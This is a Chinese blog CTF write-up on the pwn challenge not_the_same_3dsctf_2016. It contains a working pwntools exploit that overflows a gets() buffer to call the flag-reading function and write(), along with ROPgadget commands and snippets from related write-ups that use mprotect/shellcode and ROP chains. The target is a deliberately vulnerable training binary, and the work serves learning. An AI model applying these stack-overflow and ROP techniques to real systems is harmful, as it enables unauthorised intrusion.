not_the_same_3dsctf_2016

最新推荐文章于 2025-08-04 17:11:02 发布
最新推荐文章于 2025-08-04 17:11:02 发布
阅读量101 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130743612
文章描述了一位安全研究员在分析一个名为not_the_same_3dsctf_2016的程序时,发现可能存在缓冲区溢出漏洞。他们搜索了用于执行系统命令的函数和读写文件的函数,并找到了读取flag.txt的潜在方法。通过构造特定输入,利用write函数将flag.txt的内容写入内存,然后使用交互模式进一步操作程序以揭示flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

小白垃圾做题笔记而已,不建议阅读。

看下main函数,存在溢出。

看到有好多函数,我感觉是静态编译,于是我去找有没有system函数和/bin/sh(shift+f12)

结果好像没有

不过我发现了这个

 

双击后,ctrl+x查看调用函数。

读取flag就很好。

 

那么找下有没有puts或者write函数。

左边的函数窗口ctrl+F输入要找的函数名。

解题思路大概是将flag.txt读到某个地址里,然后将flag写出来。

exp

from pwn import *

debug=0
if debug:
    p=process('./not_the_same_3dsctf_2016')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    gdb.attach(p)
else:
    p=remote('node4.buuoj.cn',28256)
    
def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)



write_add=0x0806E270

open_flagtxt=0x080489A0

f14g_add=0x080ECA2D


#p.recvuntil(b'm3m0... ')

se(b'b'*0x2d+p32(open_flagtxt)+p32(write_add)+b'a'*4+p32(1)+p32(f14g_add)+p32(45))


#p.recv(45)



p.interactive()

#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"

buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 567
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
【BUUCTF - PWN】not_the_same_3dsctf_2016
古月浪子的博客
03-27 1624
checksec一下,可以栈溢出 IDA打开看看,直接可以溢出 有一个后门函数,会把flag放在bss段上 程序有write函数,通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 4050
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 293
本题目本地与远程得用两种方案打。
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1813
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
强网杯 stkof 拟态防御&not_the_same_3dsctf_2016
weixin_44113469的博客
02-07 321
强网杯 stkof 拟态防御 之前强网杯的一道简单题,栈溢出,俩程序,静态编译 ropchain 一梭子getshell,因为是拟态防御,所以必须一个payload 同时打俩程序,熟悉rop链构造,就很愉快,否则就比较尴尬。 exp: from pwn import * #p=remote p=process("./pwn2")st p.recvuntil('try to pwn it?\n') rop32='' rop32+=struct.pack('<I', 0x0806e9cb) # por.
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1604
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1581
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 618
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
not_the_same_3dsctf_2016【简单解法和mprotect解法】
qq_41696518的博客
08-29 1049
not_the_same_3dsctf_2016,含mprotect解法和常规解法
buuctf之 not_the_same
qq_42728977的博客
02-19 675
题目:not_the_same_3dsctf_2016 环境:ubuntu14 漏洞点:栈溢出、mprotect、shellcode 思路:使用mprotect更改内存权限,通过栈溢出更改程序流程,读入shellcode并执行 参考链接: get_started_3dsctf_2016-Pwn get_started_3dsctf_2016-Pwn 上来就这,感觉这个题很简单啊。 再看看函数列表...
Fabarta个人专属智能体限时体验中:高效、安全的长文写作新搭档
Fabarta的博客
08-01 392
此外,报告还提到了数据孤岛、数据质量不高的问题,这些都阻碍了企业的跨域协同,也降低了企业的数据向知识转化的效率。在保证用户的资料、文件与数据完全私密不泄露的情况下,该产品完美融合了用户本地数据与互联网上可以触达的公开信息,快速应答用户的各类请求与问题。1)王律师基于个人构建好的本地知识库,输入需求:“分析本案胜诉关键点,撰写金融借款合同纠纷证据规则实务指南,引用3个类案,字数2000左右”;5)智能体生成专业化内容,王律师可实时调整个别段落,对不满意的段落进行改写、润色,插入类案对比等;
关于Web前端安全之XSS攻击防御增强方法
xyphf的博客
08-03 781
仅依赖前端验证是无法完全防止 XSS的,还需要增强后端验证,使用DOMPurify净化 HTML 时,还需要平衡安全性与业务需求。
金融专题|某跨境支付机构:以榫卯企业云平台 VPC 功能保障业务主体安全
SmartX 超融合
07-31 735
业务隔离,灵活互访,安全管理,精简运维。
Web 安全之开放重定向攻击(Open Redirect )详解
路多辛的所思所想
08-03 600
摘要: 开放重定向漏洞存在于网站不安全处理用户可控URL时,攻击者通过构造恶意链接将用户从可信网站重定向至钓鱼或恶意网站。攻击流程包括诱骗用户点击、服务器执行重定向、最终实施窃取信息等攻击。防范措施包括避免直接使用用户输入URL、实施白名单验证、使用相对路径及重定向确认页面。该漏洞虽不直接破坏系统,但会显著提高钓鱼攻击成功率,需通过严格验证和定期安全审计加以防范。(149字)
安全扫描:目标主机支持RSA密钥交换问题
最新发布
weixin_50859396的博客
08-04 410
Nginx中禁用RSA加密算法需配置ssl_ciphers排除所有含RSA的套件,仅保留ECDSA等非RSA算法。具体步骤:1)修改配置文件,设置ssl_ciphers为HIGH:!aNULL:!MD5:!RSA;2)推荐使用ECDSA证书;3)验证配置后重载Nginx。注意事项:需确保使用ECDSA证书避免兼容问题,且评估客户端支持情况。该方案能提升安全性,避免RSA潜在风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值